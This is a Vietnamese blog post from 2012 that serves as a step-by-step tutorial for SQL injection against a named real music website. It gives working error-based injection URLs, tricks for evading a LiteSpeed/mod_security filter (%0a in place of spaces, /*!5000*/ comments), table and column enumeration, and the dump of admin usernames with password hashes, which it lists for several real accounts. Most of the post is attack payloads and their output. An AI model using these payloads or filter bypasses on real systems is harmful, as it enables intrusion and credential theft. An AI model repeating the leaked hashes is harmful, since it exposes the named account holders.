Hướng Dẫn Hack site lỗi SQL bị chặn xuất hiện “406 Not Acceptable “

Hướng Dẫn Hack site lỗi SQL bị chặn xuất hiện “406 Not Acceptable “

Site ví dụ: http://www.mp3hungama.com/
Đường link bị lỗi: http://www.mp3hungama.com/music/genre_albums.php?id=1

Kiểm tra đường link bị lỗi bằng cách them dấu “ ‘ “ :
http://www.mp3hungama.com/music/genre_albums.php?id=1
Xuất hiện lỗi: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

Bước 1: +) Check Số số trường cột: sử dụng: “order by …–“

http://www.mp3hungama.com/music/genre_albums.php?id=1 order by 10–
Site bị lỗi, tiếp tục thử:
+) http://www.mp3hungama.com/music/genre_albums.php?id=1 order by 3–
Site bình thường, tiếp tục:
+) http://www.mp3hungama.com/music/genre_albums.php?id=1 order by 4–
Ok, site bị lỗi, chứng tỏ số cột có trong database là: 4-1 =3
Chúng ta tiếp tục khai thác nhé!

Bước 2: Lấy thông tin về version, database, user:

+ http://www.mp3hungama.com/music/genre_albums.php?id=1 union select 1,2,3–

Câu lệnh đúng cả mà xuất hiện lỗi:

406 Not Acceptable
This request is not acceptable
________________________________________
Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!

+) Với lỗi này, ta thay khoảng trắng space bằng: %0a

http://www.mp3hungama.com/music/genre_albums.php?id=1 union%0aselect 1,2,3–
Ok, trang đã vào được, nhưng sao không thấy số má gì cả nhỉ, thử thay số 1 bằng null xem

http://www.mp3hungama.com/music/genre_albums.php?id=null union%0aselect 1,2,3–
Cũng không được. Cách đó bỏ qua, bây giờ chúng ta chuyển sng cách khác:

http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0aconcat_ws(version(),database(),user())),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)
hix, vẫn bị lỗi

406 Not Acceptable
This request is not acceptable
________________________________________
Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!

Để khăc phục lỗi này, ta thử chèn %0a giữa select và concat_ws xem,

http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0aconcat_ws(version(),database(),user())),floor(rand(0)*5))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)

Ok, đã xuất hiện thông tin ta muốn:
[Duplicate entry ‘hungama_music5.0.92-community-loghungama_fizi@localhost1’ for key 1
Version 5. , ngon roofy, không cần phải mò mẫn.

Bước 3: Exploit tên tables

+ Chèn đoạn mã sau:
http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0a/*!5000table_name*/ from information_schema.tables /*!5000where*/ table_schema=database() limit 0,1),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)

Lưu ý: ta đặt /*!5000…..*/ mục đích để không bị chăn bởi mod security khi xuất hiện lỗi: “406 Not Acceptable “
Ta được table đầu tiên: ‘active_guests’
Duplicate entry ‘active_guests1’ for key 1

+) Để lấy các tables tiếp theo ta thay: limit 1,1 rồi limit 2,1…. Cho tới khi nào tới table mà mình cần lấy.
Limit 1,1 table là: active_users
Limit 2,1 table là: admin_review_mgt1…..
Và table tôi muốn khai thác là: limit 43,1: users

http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0a/*!5000table_name*/ from information_schema.tables /*!5000where*/ table_schema=database() limit 43,1),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)

Duplicate entry ‘users1’ for key 1
Ok! Tiếp tục khai thác table “users”

Bước 4: Exploit tên columns

+) http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0a/*!5000column_name*/ from information_schema.columns /*!5000where*/ table_schema=database() and /*!5000table_name*/=0x7573657273 limit 0,1),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)

Xuât hiện column đầu tiên là: “username”
Duplicate entry ‘username1’ for key 1
+) Tương tự như trên, limit 1,1

http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0a/*!5000column_name*/ from information_schema.columns /*!5000where*/ table_schema=database() and /*!5000table_name*/=0x7573657273 limit 1,1),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)
Ta được column thứ 2: password
Duplicate entry ‘password1’ for key 1
Như thế là đủ rồi các bạn nhỉ,

Bước 5: Lấy thông tin admin:

+)http://www.mp3hungama.com/music/genre_albums.php?id=1 and (select 1 from (select count(*),concat((select%0Aconcat(username,0x7c,password) from users limit 0,1),floor(rand(0)*2))ducdung08clc from information_schema.tables group by ducdung08clc)bachkhoa)

Kêt quả: Duplicate entry ‘admin|3d145b6d4827e1f25994a3da418419e41’ for key 1
Ta đã có tài khoản admin bao gồm: username/password: admin|3d145b6d4827e1f25994a3da418419e4
Lưu ý: từ đầu bài đến giờ ta không quan tâm con số 1 ở cuối, nên bây giờ password mã hóa ta cũng không cho số 1 ấy vào

+) Để lấy các tài khoản quản trị khác ta cứ việc lên “limit”

Với limit 1,1 ta được username/password:
obaid|15d4b4bb7b462baf16e04eadc399e4be

Với limit 2,1 ta được username/password:
geniusarien|2cbb8de1484e29bb4ad9865412c36f26

Với limit 3,1 ta được username/password:
junaidshaheen|a7899c013b27bd38e1e3a1905dfc1a65

Với limit 4,1 ta được username/password:
nicx|7eb865ffc81fb5eb3638ddbcfcb6a68c

Với limit 5,1 ta được username/password:
munib|f5a4324a48f0f18095e7de550b2407bb

Hix, tài nhiều tài khoản quá, các bạn muốn lấy tiếp thì làm tương tự nhé. Quan trong là có được admin bigsmile

Chúc Vui!

By: ducdung.08clc

About securityforall

it, smile, share for people,...

Posted on May 7, 2012, in Hack SQL Injection. Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: